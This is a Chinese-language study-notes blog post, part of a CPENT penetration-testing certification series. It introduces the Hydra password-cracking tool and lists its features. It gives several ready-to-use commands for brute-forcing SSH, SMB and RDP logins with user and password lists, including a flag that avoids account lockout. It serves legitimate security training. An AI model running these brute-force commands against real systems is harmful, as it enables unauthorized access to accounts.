iT邦幫忙

2023 iThome 鐵人賽

DAY 4
1
Security

滲透測試小白的 CPENT 證照學習筆記系列 第 4

Hydra 九頭蛇 - 暴力破解工具

  • 分享至 

  • xImage
  •  

Hydra 是一個強大的密碼破解工具,主要用於測試和評估電腦系統的安全性。它被廣泛用於測試網路、應用程序和服務的安全性,以確保它們不容易受到未經授權的訪問或攻擊。

  • 以下是 Hydra 工具的主要特點和功能:

    • 多協議支持:Hydra支援多種協議和服務,包括SSH、FTP、HTTP、RDP、Telnet、SMTP等。這使得它適用於各種不同的測試場景。
    • 多種攻擊模式:Hydra提供了多種攻擊模式,包括字典攻擊、暴力攻擊、蠻力攻擊等,可以根據測試需求選擇不同的攻擊方式。
    • 多線程和並行處理:Hydra可以並行處理多個請求,這使得它能夠加快密碼破解的速度。
    • 自動化和腳本化:用戶可以使用腳本來自動化攻擊,這樣可以更輕鬆地批量測試多個目標。
    • 多平台支援:Hydra可在多個不同的操作系統上運行,包括Linux、Windows和Mac OS。
  • 使用範例:

    • 以單一帳號+密碼檔,對目標 SSH 伺服器執行暴力破解攻擊。
      hydra –t 4 –l <username> –P <passwords.txt> ssh://<ssh_IP>
      image.png

    • 以帳號檔+密碼檔,對目標 SSH 伺服器執行暴力破解攻擊。
      hydra –t 4 –L <users.txt> –P <passwords.txt> ssh://<ssh_IP> -u
      -L:帳號檔路徑
      -P:密碼檔路徑
      -u:使用一組密碼 Try 所有帳號後,在 Try 下一組密碼,避免同一個帳號短時間錯太多次(容易被鎖)。
      -t:指定線程數或並行執行的任務數。具體來說,它控制 Hydra 同時執行的密碼破解任務數。

    • 以帳號檔+密碼檔,對目標 SMB 伺服器執行暴力破解攻擊。
      hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt smb://192.168.103.12

    • 以單一帳號+密碼檔,對目標 SMB 伺服器執行暴力破解攻擊。
      hydra -l administrator -P Passwords-CPENT.txt smb://172.16.30.4
      image.png

    • 以帳號檔+密碼檔,對目標 RDP 伺服器執行暴力破解攻擊。
      hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt rdp://192.168.103.12


上一篇
用 nbtstat 指令解析 NetBIOS 名稱
下一篇
Linux 常用指令
系列文
滲透測試小白的 CPENT 證照學習筆記30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言